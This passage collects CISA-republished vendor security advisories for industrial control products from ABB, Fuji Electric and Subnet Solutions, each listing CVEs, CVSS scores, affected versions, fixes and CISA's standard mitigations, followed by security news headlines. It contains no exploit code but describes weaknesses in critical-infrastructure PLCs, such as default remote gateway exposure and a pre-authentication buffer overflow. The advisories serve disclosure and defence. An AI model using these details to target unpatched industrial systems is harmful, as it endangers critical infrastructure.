Yes, an attacker who has network access to an affected system node could exploit this vulnerability. Recommended practices include that users' network systems are physically protected, have no direct connections to the Internet or any other untrusted network, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed.

What does the update do?
The WebPro SNMP Card PowerValue v1.1.8.p update has fixes for all the vulnerabilities mentioned in the “Vulnerability severity and details” section.

When this security advisory was issued, had this vulnerability been publicly disclosed?
No, the vulnerabilities have not been publicly disclosed.

When this security advisory was issued, had ABB received any reports that this vulnerability was being exploited?
No, ABB had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued.

Legal Notice and Terms of Use

This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability:

- Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer

This ICSA is a verbatim republication of ABB PSIRT 2CRT000009 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory.

Revision History

Initial Release Date: 2026-01-07
- 2026-01-07, revision 1: Initial version.
- 2026-05-12, revision 2: Initial CISA republication of ABB PSIRT 2CRT000009 advisory.

0
ABB Automation Builder Gateway for Windows

Summary

ABB became aware of a severe vulnerability in the product versions listed as affected in the advisory. The Windows gateway is accessible remotely by default. Unauthenticated attackers can therefore search for PLCs, but the user management of the PLCs prevents the actual access to the PLCs – unless it is disabled.

The following versions of ABB Automation Builder Gateway for Windows are affected: Automation Builder <2.9.0, 2.9.0

CVSS v3: 5.3
Vendor: ABB
Equipment: ABB Automation Builder Gateway for Windows
Vulnerabilities: Initialization of a Resource with an Insecure Default

Background

Critical Infrastructure Sectors: Chemical, Critical Manufacturing, Energy, Water and Wastewater
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities

CVE-2024-41975
The gateway serves as a communication channel for various clients to AC500 PLCs. By default, the gateway listens on all available network adapters on port 1217 and can therefore be accessed remotely. However, remote access to the gateway is only required in certain network configurations. Since the gateway is usually accessed locally, many users are unaware of this remote access option, which can enable scanning of and access to restricted PLC networks. Unauthenticated attackers can therefore search for PLCs, but the user management of the PLCs prevents the actual access to the PLCs – unless it is disabled. Please note that the gateway for Windows can be installed as a separate setup or as part of other setups such as the CODESYS Development System V3 setup or the CODESYS OPC DA Server setup.
Affected products: ABB Automation Builder <2.9.0 (product status: fixed, known_affected)

Remediations

Vendor fix: If remote access is not required, check the "LocalAddress" setting in the [CmpGwCommDrvTcp] section of the Gateway's configuration file as follows (a restart of the gateway is required in case of changes):

    [CmpGwCommDrvTcp]
    LocalAddress=127.0.0.1 ; allow access only from the local computer

The gateway configuration file can be located at (example for Automation Builder 2.8): %ProgramFiles%\ABB\AB2.8\AutomationBuilder\GatewayPLC\Gateway.cfg

Starting with Automation Builder version 2.9.0 the vulnerability is closed by setting the default for the gateway to local access. Automation Builder 2.9.0 is available for download from the related download site: https://www.abb.com/global/en/areas/motion/digital-tools/automation-builder/software-download

Workaround: Workarounds are specific measures that a user can take to help block an attack; for example, temporarily disabling the vulnerable feature may remove the exposure with well-known impact on functionality. ABB has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they can help block known attack vectors. When a workaround reduces functionality, this is identified below as “Impact of workaround”. The vulnerability can be closed by enabling local access only. See chapter “Recommended immediate actions” for details.

Relevant CWE: CWE-1188 Initialization of a Resource with an Insecure Default
Metrics: CVSS v3.1 base score 5.3 (MEDIUM), vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F/RL:O/RC:C

Acknowledgments

ABB PSIRT reported this vulnerability to CISA.

Notice

The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.

Frequently Asked Questions

What causes the vulnerability?
Refer to section “Vulnerability severity and details“.

What is the ABB Automation Builder?
The ABB Automation Builder is the programming and commissioning tool mainly for the ABB PLC AC500 and the operator panels CP600.

What might an attacker use the vulnerability to do?
An attacker who successfully exploited this vulnerability could scan for connected PLCs.

Could the vulnerability be exploited remotely?
Yes, an attacker who has network access to an affected system node could exploit this vulnerability. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed.

What does the update do?
The update removes the vulnerability by setting the defaults of the gateway to local access.

When this security advisory was issued, had this vulnerability been publicly disclosed?
Yes, this vulnerability has been publicly disclosed.

When this security advisory was issued, had ABB received any reports that this vulnerability was being exploited?
No, ABB had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued.

Legal Notice and Terms of Use

This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities:

- Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer

This ICSA is a verbatim republication of ABB PSIRT 3ADR011525 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory.

Revision History

Initial Release Date: 2026-02-24
- 2026-02-24, revision 1: Initial version.
- 2026-05-12, revision 2: Initial CISA republication of ABB PSIRT 3ADR011525 advisory.

0
Fuji Electric Tellus

Summary

Successful exploitation of this vulnerability could allow an attacker to elevate privileges from user to system, which may then enable the attacker to cause a temporary denial of service, open files, or delete files.

The following versions of Fuji Electric Tellus are affected: Tellus 5.0.2

CVSS v3: 7.8
Vendor: Fuji Electric
Equipment: Fuji Electric Tellus
Vulnerabilities: Exposed Dangerous Method or Function

Background

Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Japan

Vulnerabilities

CVE-2026-8108
The installation of Fuji Tellus adds a driver to the kernel which grants all users read and write permissions.
Affected products: Fuji Electric Tellus 5.0.2 (product status: known_affected)
Remediations: Vendor fix: Fuji Electric recommends that Tellus be installed only with administrator privileges.
Relevant CWE: CWE-749 Exposed Dangerous Method or Function
Metrics: CVSS v3.1 base score 7.8 (HIGH), vector string CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Acknowledgments

Kim Myung-gyu of Trend Micro Zero Day Initiative reported this vulnerability to CISA.

Legal Notice and Terms of Use

This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

- Do not click web links or open attachments in unsolicited email messages.
- Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
- Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.

Revision History

Initial Release Date: 2026-05-12
- 2026-05-12, revision 1: Initial Publication.

0
ABB AC500 V3 Stack Buffer Overflow in Cryptographic Message Syntax

Summary

ABB became aware of a vulnerability in the product versions listed as affected in the advisory. An update is available that resolves the publicly reported vulnerability. An attacker who successfully exploited these vulnerabilities could cause a crash, denial-of-service (DoS), or potentially remote code execution.

The following versions of ABB AC500 V3 are affected: AC500 V3 PM5xxx 3.9.0, 3.9.0_HF1

CVSS v3: 9.8
Vendor: ABB
Equipment: ABB AC500 V3
Vulnerabilities: Out-of-bounds Write

Background

Critical Infrastructure Sectors: Chemical, Critical Manufacturing, Energy, Water and Wastewater
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities

CVE-2025-15467
When parsing CMS (Auth)EnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk.
Affected products: ABB AC500 V3 PM5xxx Firmware Version 3.9.0 (product status: fixed, known_affected)

Remediations

Vendor fix: The problem is corrected in the following product version: AC500 V3 firmware version 3.9.0 HF1. ABB recommends that customers apply the update at the earliest convenience. This firmware version is released for all AC500 V3 PLC types and is available for download from the ABB library: https://search.abb.com/library/Download.aspx?DocumentID=3ADR011537&LanguageCode=en&DocumentPartId=&Action=Launch

Mitigation: Refer to section “General security recommendations” for further advice on how to keep your system secure.

Workaround: No workarounds are available.

Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS v3.1 base score 9.8 (CRITICAL), vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C

Acknowledgments

ABB PSIRT reported this vulnerability to CISA.

Notice

The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.

Frequently Asked Questions

What causes the vulnerability?
Parsing a CMS AuthEnvelopedData or EnvelopedData message with maliciously crafted AEAD parameters can trigger a stack buffer overflow.

What is AC500 V3?
The AC500 V3 is a scalable range of Programmable Logic Controllers (PLC). It provides solutions for small, medium and high-end applications. The AC500 V3 platform offers different performance levels and is the ideal choice for high availability, extreme environments, condition monitoring, motion control or safety solutions. It offers interoperability and compatibility in hardware and software from compact PLCs up to high-end and safety PLCs.

What might an attacker use the vulnerability to do?
An attacker who successfully exploited these vulnerabilities could cause a crash, denial-of-service (DoS), or potentially remote code execution.

How could an attacker exploit the vulnerability?
Refer to section “Vulnerability severity and details“.

Could the vulnerability be exploited remotely?
Yes, an attacker who has network access to an affected system node could exploit the vulnerabilities. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed.

When this security advisory was issued, had this vulnerability been publicly disclosed?
Yes, the vulnerabilities have been publicly disclosed.

When this security advisory was issued, had ABB received any reports that this vulnerability was being exploited?
No, ABB had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued.

Legal Notice and Terms of Use

This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities:

- Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer

This ICSA is a verbatim republication of ABB PSIRT 3ADR011536 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory.

Revision History

Initial Release Date: 2026-03-12
- 2026-03-12, revision 1: Initial version.
- 2026-05-12, revision 2: Initial CISA republication of ABB PSIRT 3ADR011536 advisory.

Subnet Solutions PowerSYSTEM Center

Summary
Successful exploitation of these vulnerabilities could allow an authenticated attacker to expose sensitive information or cause a CRLF injection.

The following versions of Subnet Solutions PowerSYSTEM Center are affected:
- PowerSYSTEM Center 2020 <=5.28.x (CVE-2026-35504)
- PowerSYSTEM Center 2020 >=5.8.x|<=5.28.x (CVE-2026-26289)
- PowerSYSTEM Center 2020 >=5.11.x|<=5.28.x (CVE-2026-33570)
- PowerSYSTEM Center 2024 >=6.0.x|<=6.1.x (CVE-2026-26289, CVE-2026-35555, CVE-2026-35504)
- PowerSYSTEM Center 2026 7.0.x (CVE-2026-26289, CVE-2026-35555, CVE-2026-35504)

CVSS: v3 8.2
Vendor: Subnet Solutions Inc.
Equipment: Subnet Solutions PowerSYSTEM Center
Vulnerabilities: Incorrect Authorization, Improper Neutralization of CRLF Sequences ('CRLF Injection')

Background
Critical Infrastructure Sectors: Critical Manufacturing, Energy
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Canada

Vulnerabilities

CVE-2026-26289
PowerSYSTEM Center REST API endpoint for device account export allows an authenticated user with limited permissions to expose sensitive information normally restricted to administrative permissions only.
Affected Products: Subnet Solutions PowerSYSTEM Center
Vendor: Subnet Solutions Inc.
Product Version: Subnet Solutions Inc. PowerSYSTEM Center 2020: >=5.8.x|<=5.28.x, Subnet Solutions Inc. PowerSYSTEM Center 2024: >=6.0.x|<=6.1.x, Subnet Solutions Inc. PowerSYSTEM Center 2026: 7.0.x
Product Status: known_affected
Remediations
Mitigation: Subnet Solutions recommends users update to the latest version of PowerSYSTEM Center: PSC 2020 Update 29, PSC 2024 Update 2, and PSC 2026 GA Hotfix.
Mitigation: For assistance in upgrading, users should contact a Subnet Solutions System Integration team member or customer support team at (403) 270-8885 or by email at support@subnet.com.
Mitigation: Subnet Solutions recommends users do the following in order to reduce risk:
- Monitor user activity records to ensure users are following acceptable usage policies of the application.
- Restrict access to Notification Settings to trusted Administrators.
- Monitor "Send from Address" in settings and Activity Records.
- Configure a notification rule that triggers on any bulk account export activity.
Relevant CWE: CWE-863 Incorrect Authorization
Metrics
CVSS Version: 3.1
Base Score: 8.2
Base Severity: HIGH
Vector String: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L

CVE-2026-33570
PowerSYSTEM Center REST API endpoint for devices allows a low-privilege authenticated user to access information normally limited by operational permissions.
Affected Products: Subnet Solutions PowerSYSTEM Center
Vendor: Subnet Solutions Inc.
Product Version: Subnet Solutions Inc. PowerSYSTEM Center 2020: >=5.11.x|<=5.28.x
Product Status: known_affected
Remediations: the same three mitigations as listed for CVE-2026-26289 above (update to PSC 2020 Update 29, PSC 2024 Update 2, or PSC 2026 GA Hotfix; contact Subnet Solutions support for upgrade assistance; apply the monitoring and access-restriction measures).
Relevant CWE: CWE-863 Incorrect Authorization
Metrics
CVSS Version: 3.1
Base Score: 5.7
Base Severity: MEDIUM
Vector String: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVE-2026-35555
PowerSYSTEM Center feature for device project groups allows an authenticated user with limited permissions to perform an unauthorized deletion of project groups.
Affected Products: Subnet Solutions PowerSYSTEM Center
Vendor: Subnet Solutions Inc.
Product Version: Subnet Solutions Inc. PowerSYSTEM Center 2024: >=6.0.x|<=6.1.x, Subnet Solutions Inc. PowerSYSTEM Center 2026: 7.0.x
Product Status: known_affected
Remediations: the same three mitigations as listed for CVE-2026-26289 above.
Relevant CWE: CWE-863 Incorrect Authorization
Metrics
CVSS Version: 3.1
Base Score: 6.3
Base Severity: MEDIUM
Vector String: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L

CVE-2026-35504
PowerSYSTEM Center email notification service is affected by a CRLF injection vulnerability when using SMTPS communication.
Affected Products: Subnet Solutions PowerSYSTEM Center
Vendor: Subnet Solutions Inc.
Product Version: Subnet Solutions Inc. PowerSYSTEM Center 2020: <=5.28.x, Subnet Solutions Inc. PowerSYSTEM Center 2024: >=6.0.x|<=6.1.x, Subnet Solutions Inc. PowerSYSTEM Center 2026: 7.0.x
Product Status: known_affected
Remediations: the same three mitigations as listed for CVE-2026-26289 above.
Relevant CWE: CWE-93 Improper Neutralization of CRLF Sequences ('CRLF Injection')
Metrics
CVSS Version: 3.1
Base Score: 5.5
Base Severity: MEDIUM
Vector String: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Acknowledgments
Kelly Stich of Subnet Solutions Inc reported these vulnerabilities to CISA.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities.
- Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:
- Do not click web links or open attachments in unsolicited email messages.
- Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
- Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. These vulnerabilities are not exploitable remotely.

Revision History
Initial Release Date: 2026-05-12
Date        Revision  Summary
2026-05-12  1         Initial Publication

ABB AC500 V3 Multiple Vulnerabilities

Summary
ABB became aware of severe vulnerabilities in the product versions listed as affected in the advisory. An update is available that resolves these vulnerabilities. An attacker who successfully exploited these vulnerabilities could bypass the user management and read visualization files (CVE-2025-2595), read and write certificates and keys (CVE-2025-41659) or cause a denial-of-service (DoS) (CVE-2025-41691).

The following versions of ABB AC500 V3 are affected: AC500 V3 <3.9.0, 3.9.0

CVSS: v3 8.3
Vendor: ABB
Equipment: ABB AC500 V3
Vulnerabilities: Direct Request ('Forced Browsing'), Incorrect Permission Assignment for Critical Resource, NULL Pointer Dereference

Background
Critical Infrastructure Sectors: Chemical, Critical Manufacturing, Energy, Water and Wastewater
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities

CVE-2025-2595
The visualization allows users to create browser-based visualizations for monitoring and controlling industrial processes. Access to these visualizations can be restricted using the built-in user management. However, an unauthenticated remote attacker can bypass the user management and read visualization files by means of forced browsing. The exposed files, accessible via a web browser, contain only static visualization data such as text lists, icons or images, but no live data from the controlled system.
Affected Products: ABB AC500 V3
Vendor: ABB
Product Version: ABB AC500 V3 <3.9.0
Product Status: fixed, known_affected
Remediations
Vendor fix: The problem is corrected in the following product versions:
- AC500 V3 firmware version 3.9.0
ABB recommends that customers apply the update at the earliest convenience. This firmware version is released for all AC500 V3 PLC types and is available from Automation Builder 2.9.0. Automation Builder 2.9.0 is available for download from the related download site:
https://www.abb.com/global/en/areas/motion/digital-tools/automation-builder/software-download
Mitigation: Refer to section “General security recommendations” for further advice on how to keep your system secure.
Workaround: No workarounds are available.
Relevant CWE: CWE-425 Direct Request ('Forced Browsing')
Metrics
CVSS Version: 3.1
Base Score: 5.3
Base Severity: MEDIUM
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F/RL:O/RC:C

CVE-2025-41659
A vulnerability in the runtime system allows low-privileged remote attackers to access the PKI folder via CODESYS protocol, enabling them to read and write certificates and keys. This exposes sensitive cryptographic data and allows unauthorized certificates to be trusted. However, all services remain available; only certificate-based encryption and signing features are concerned. The issue affects systems using the optional CmpOpenSSL component for cryptographic operations.
Affected Products: ABB AC500 V3
Vendor: ABB
Product Version: ABB AC500 V3 <3.9.0
Product Status: fixed, known_affected
Remediations: vendor fix (AC500 V3 firmware version 3.9.0 via Automation Builder 2.9.0), mitigation and workaround as listed for CVE-2025-2595 above.
Relevant CWE: CWE-732 Incorrect Permission Assignment for Critical Resource
Metrics
CVSS Version: 3.1
Base Score: 8.3
Base Severity: HIGH
Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L/E:F/RL:O/RC:C

CVE-2025-41691
A vulnerability in the runtime system's CmpDevice component allows unauthenticated attackers to cause a denial-of-service (DoS) via specially crafted communication requests. The issue is triggered by a NULL pointer dereference and also affects systems when outdated clients attempt to log in.
Affected Products: ABB AC500 V3
Vendor: ABB
Product Version: ABB AC500 V3 <3.9.0
Product Status: fixed, known_affected
Remediations: vendor fix (AC500 V3 firmware version 3.9.0 via Automation Builder 2.9.0), mitigation and workaround as listed for CVE-2025-2595 above.
Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics
CVSS Version: 3.1
Base Score: 7.5
Base Severity: HIGH
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:C

Acknowledgments
ABB PSIRT reported these vulnerabilities to CISA.

Notice
The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.

Frequently Asked Questions
What causes the vulnerability?
- Refer to section “Vulnerability severity and details”.
What is AC500 V3?
- The AC500 V3 is a scalable range of Programmable Logic Controllers (PLC). It provides solutions for small, medium and high-end applications. The AC500 V3 platform offers different performance levels and is the ideal choice for high availability, extreme environments, condition monitoring, motion control or safety solutions. It offers interoperability and compatibility in hardware and software from compact PLCs up to high-end and safety PLCs.
What might an attacker use the vulnerability to do?
- An attacker who successfully exploited these vulnerabilities could bypass the user management and read visualization files (CVE-2025-2595), read and write certificates and keys (CVE-2025-41659) or cause a denial-of-service (DoS) (CVE-2025-41691).
How could an attacker exploit the vulnerability?
- Refer to section “Vulnerability severity and details”.
Could the vulnerability be exploited remotely?
- Yes, an attacker who has network access to an affected system node could exploit the vulnerabilities. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed.
When this security advisory was issued, had this vulnerability been publicly disclosed?
- Yes, the vulnerabilities have been publicly disclosed.
When this security advisory was issued, had ABB received any reports that this vulnerability was being exploited?
- No, ABB had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability.
- Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of ABB PSIRT 3ADR011524 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-02-24
Date        Revision  Summary
2026-02-24  1         Initial version.
2026-05-12  2         Initial CISA Republication of ABB PSIRT 3ADR011524 advisory

Tech Can't Stop These Threats — Your People Can

Security controls can do only so much. Here are four attacks where your employees are usually your first, and only, line of cyber defense.

'Dirty Frag' Exploit Poised to Blow Up on Enterprise Linux Distros

The privilege escalation vulnerability, which is similar to other Linux flaws like Copy Fail and Dirty Pipe, may already be under limited exploitation.

Hackers Use AI for Exploit Development, Attack Automation

Cyber adversaries have long used AI, but now attackers are using large language models to develop exploits and orchestrate complex attacks.

Fake OpenAI repository on Hugging Face pushes infostealer malware

A malicious Hugging Face repository that reached the platform's trending list impersonated OpenAI's "Privacy Filter" project to deliver information-stealing malware to Windows users. [...]

Court lets Arbitrum DAO transfer $71M in ETH tied to North Korea hack to Aave

A Manhattan judge modified a restraining notice to let Arbitrum DAO move $71 million in frozen Ether to Aave, while preserving terrorism victims’ legal claim on the funds.

Strike CEO Jack Mallers dismisses idea that Wall Street threatens Bitcoin

Strike CEO Jack Mallers argued that if Wall Street “kills” Bitcoin, then the asset was never going to succeed in the first place.

ShinyHunters Claims Second Attack Against Instructure

The edtech company is struggling to wrest control from its hackers. PII belonging to hundreds of millions of people is on the line.

Poland says hackers breached water treatment plants, and the US is facing the same threat

A report by Poland’s top intelligence agency accused Russia of sabotage and hacking activities against the country’s military and civilian infrastructure.

US defense contractor who sold hacking tools to Russian broker ordered to pay $10M to former employers

